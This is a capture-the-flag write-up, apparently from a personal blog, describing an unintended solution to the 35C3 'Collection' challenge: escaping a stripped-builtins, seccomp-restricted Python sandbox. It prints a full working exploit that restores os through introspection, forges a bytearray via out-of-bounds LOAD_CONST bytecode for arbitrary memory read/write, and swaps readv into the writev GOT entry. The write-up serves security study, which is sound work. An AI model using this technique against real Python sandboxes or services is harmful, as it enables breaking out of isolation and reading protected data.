35c3ctf: Collection - an Unintended Solution!

By David Buchanan, 30^th December 2018

The challenge provided the following files:

dist/
dist/server.py
dist/Collection.cpython-36m-x86_64-linux-gnu.so
dist/test.py
dist/python3.6
dist/libc-2.27.so

server.py is a python script which accepts some user input. It also opens the flag for you and uses dup2 to duplicate the file descriptor to fd 1023. Then, it executes your input with the provided python3.6 interpreter. One small catch is that the following snippet is prepended to your code:

from sys import modules
del modules['os']
import Collection
keys = list(__builtins__.__dict__.keys())
for k in keys:
    if k != 'id' and k != 'hex' and k != 'print' and k != 'range':
        del __builtins__.__dict__[k]

This code attemps to set up a basic Python sandbox. The general idea behind this challenge is to escape the sandbox so that you can read the flag from the already opened file descriptor.

The intended solution is to exploit the custom Collection module which has been made. However, my solution doesn't use it at all :P

First, lets look at what the sandbox prefix actually does:

It deletes os from sys.modules.
It imports the Collection native module.
It deletes every builtin function from the __builtins__ object, except for a few: id, hex, print and range - presumably because the challenge author was feeling generous.

The first step to my unintended solution revolves around the fact that sandboxing python is very hard to do properly. Removing an object from sys.modules or __builtins__ doesn't actually irreversably delete it. There will still be plenty of references to them lying around, we just have to search a bit for them.

I used introspection to get back some of the basic builtins to maintain my sanity:

1
2
3

str = "".__class__
bytes = b"".__class__
bytearray = [x for x in b"".__class__.__base__.__subclasses__() if "bytearray" in str(x)][0]

Getting back os was a bit more tricky, but still doable:

1	os = [t for t in ().__class__.__bases__[0].__subclasses__() if 'ModuleSpec' in t.__name__][0].__repr__.__globals__['sys'].modules["os.path"].os

(This one is probably a bit more complex than it needs to be, but hey, it works...)

Now that we have os, we can just call os.read(1023, 100) right? Unfortunately if we try that, we get the following output:

Bad system call (core dumped)

What's going on? It turns out that the Collection module sets up a seccomp filter, which restricts what syscalls we can use.

I used seccomp-tools in order to extract the filters:

$ seccomp-tools dump "./python3.6 -c 'import Collection'"
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x20 0x00 0x00 0x00000000  A = sys_number
 0004: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0006
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0006: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0008
 0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0008: 0x15 0x00 0x01 0x0000000c  if (A != brk) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0012
 0011: 0x05 0x00 0x00 0x00000011  goto 0029
 0012: 0x15 0x00 0x01 0x0000000b  if (A != munmap) goto 0014
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0014: 0x15 0x00 0x01 0x00000019  if (A != mremap) goto 0016
 0015: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0016: 0x15 0x00 0x01 0x00000013  if (A != readv) goto 0018
 0017: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0018: 0x15 0x00 0x01 0x000000ca  if (A != futex) goto 0020
 0019: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0020: 0x15 0x00 0x01 0x00000083  if (A != sigaltstack) goto 0022
 0021: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0022: 0x15 0x00 0x01 0x00000003  if (A != close) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0026
 0025: 0x05 0x00 0x00 0x00000037  goto 0081
 0026: 0x15 0x00 0x01 0x0000000d  if (A != rt_sigaction) goto 0028
 0027: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0028: 0x06 0x00 0x00 0x00000000  return KILL
 ...
--- SNIP - relatively unimporant secondary checks omitted ---
 ...
 0098: 0x06 0x00 0x00 0x00000000  return KILL

TL;DR, we can use the following syscalls:

exit
exit_group
brk
munmap
mremap
readv
futex
signalstack
close
rt_sigaction

We can also write to stderr and stdout (I think?), and also use mmap under certain conditions that I couldn't be bother to decode (we won't be needing this anyway).

The most important thing, which we will need in order to read the flag is readv. readv is very similar to the read syscall, except it can perform multiple reads into an array of buffers, all at once. We should be able to use this to read the flag (making use of some of the previously sandboxed objects we restored earlier):

1
2
3

flag = bytearray(128)
os.readv(1023, [flag])
print(flag)

But we are met with the following output!

Trace/breakpoint trap (core dumped)

After some more investigation, it turns out the Collection module has one more trick up it's sleeve! When the module is loaded, it patches the main python executable at runtime, and overwrites most of the os_readv_impl function with a bunch of 0xCC instructions (debugger trap). It's clear that the author of the challenge wanted to prevent us from solving this challenge the "easy" way - since we can't use os.readv any more, we will have to get some kind of native code execution in order to call the readv syscall ourselves.

Normally, getting native code execution in Python would be easy, just use the ctypes module. However, due to the seccomp restrictions we are unable to load any additional modules. After a bit of research, I encountered this technique for setting up an arbitrary read/write primitive by using custom Python bytecode. It's written for python2, but we can adjust the same concept to work with our 64-bit python3.6 build. This technique looks pretty complex (it kinda reminds me of how some WebKit exploits work), so let's break it down.

The core of this python feature/bug lies in how python interprets it's bytecode - specifically the LOAD_CONST opcode:

/* Python/ceval.c line 1298 */
TARGET(LOAD_CONST) {
    PyObject *value = GETITEM(consts, oparg);
    Py_INCREF(value);
    PUSH(value);
    FAST_DISPATCH();
}

The macro GETITEM(consts, oparg) retrieves an object from index oparg from the consts tuple, without any bounds checks (but only when Py_DEBUG is not defined!).

We can exploit this as follows:

Craft a fake bytearray object on the heap.
Work out the offset from the consts tuple to a pointer-to-the-fake-bytearray.
Craft some bytecode to return a reference to our fake bytearray.
Call the custom bytecode.
Use our crafted byterray to read/write any address!

To understand the details of this, we need to look at how CPython stores tuples and bytearrays internally. I've reconstructed the following from the CPython source (The original definitions are full of macros etc.):

struct PyByteArrayObject {
    int64_t ob_refcnt;   /* can be basically any value we want */
    struct _typeobject *ob_type; /* points to the bytearray type object */
    int64_t ob_size;     /* Number of items in variable part */
    int64_t ob_alloc;    /* How many bytes allocated in ob_bytes */
    char *ob_bytes;      /* Physical backing buffer */
    char *ob_start;      /* Logical start inside ob_bytes */
    int32_t ob_exports;  /* Not exactly sure what this does, we can ignore it */
}

struct PyTupleObject {
    int64_t ob_refcnt;
    struct _typeobject *ob_type;
    int64_t ob_size;
    PyObject *ob_item[1]; /* contains ob_size elements */
}

Step 1 is easy, we can just put some data inside a real bytearray, and it will be stored on the heap. Step 2 is also easy - Python has a builtin function id which returns the memory address of an object. If we add 0x20 to the address of the real bytearray, we get the address of the ob_bytes pointer, which will point to our crafted fake bytearray on the heap. To get the address of the tuple's internal object array, we can similarly just add 0x18 to the value returned by id, to get the address of the ob_item array. One thing to note is that the index into the ob_item array that the LOAD_CONST opcode will use is only a signed 32-bit value - but in practise, this didn't cause any issues.

Once we have a read/write primitive, we can just replace the libc function writev with readv in the GOT, so that we can use the python function os.writev in place of os.readv. This works due to the fact that readv and writev are basically "symmetrical" in the way they work.

With that all explained, this is what my final exploit looked like:

# recreate things we can't import
str = "".__class__
bytes = b"".__class__
bytearray = [x for x in b"".__class__.__base__.__subclasses__() if "bytearray" in str(x)][0]
os = [t for t in ().__class__.__bases__[0].__subclasses__() if 'ModuleSpec' in t.__name__][0].__repr__.__globals__['sys'].modules["os.path"].os

# from dis.opmap
OP_LOAD_CONST   = 100
OP_EXTENDED_ARG = 144
OP_RETURN_VALUE = 83

# packing utilities
def p8(us):
	return bytes([us&0xff])

def p64(n):
	result = []
	for i in range(0, 64, 8): result.append((n>>i)&0xff)
	return bytes(result)

def u64(n):
	res = 0
	for x in n[::-1]: res = (res<<8) | x
	return res

const_tuple = ()

# construct the fake bytearray
fake_bytearray = bytearray(
	p64(0x41414141) +          # ob_refcnt
	p64(id(bytearray)) +       # ob_type
	p64(0x7fffffffffffffff) +  # ob_size (INT64_MAX)
	p64(0) +                   # ob_alloc (doesn't seem to really be used?)
	p64(0) +                   # *ob_bytes (start at address 0)
	p64(0) +                   # *ob_start (ditto)
	p64(0)                     # ob_exports (not really sure what this does)
)

fake_bytearray_ptr_addr = id(fake_bytearray) + 0x20
const_tuple_array_start = id(const_tuple) + 0x18
offset = (fake_bytearray_ptr_addr - const_tuple_array_start) // 8

print(offset)

# construct the bytecode
bytecode = b""
for i in range(8, 32, 8)[::-1]:
	bytecode += p8(OP_EXTENDED_ARG) + p8(offset>>i)
bytecode += p8(OP_LOAD_CONST) + p8(offset)
bytecode += p8(OP_RETURN_VALUE)

def foo(): pass
foo.__code__ = foo.__code__.__class__(
	0, 0, 0, 0, 0,
	bytecode, const_tuple,
	(), (), "", "", 0, b""
)
magic = foo() # magic is now a window into most of the address space!

print(magic[0x400000:0x400000+4]) # read the elf header as a sanity check

readv_got = 0x9b3d80
writev_got = 0x9b3b28
read_got = 0x9b32e8
diff = 0x116600 - 0x110070 # libc_readv - libc_read

libc_read = u64(magic[read_got:read_got+8])
print("libc_read @", hex(libc_read))

libc_readv = libc_read + diff
print("libc_readv @", hex(libc_readv))

# replace writev with readv in the GOT
magic[writev_got:writev_got+8] = p64(libc_readv)

flag = bytearray(100)
flaglen = os.writev(1023, [flag]) # actually readv!!!
print(flag[:flaglen])

PS: I found another good writeup of the LOAD_CONST "bug" here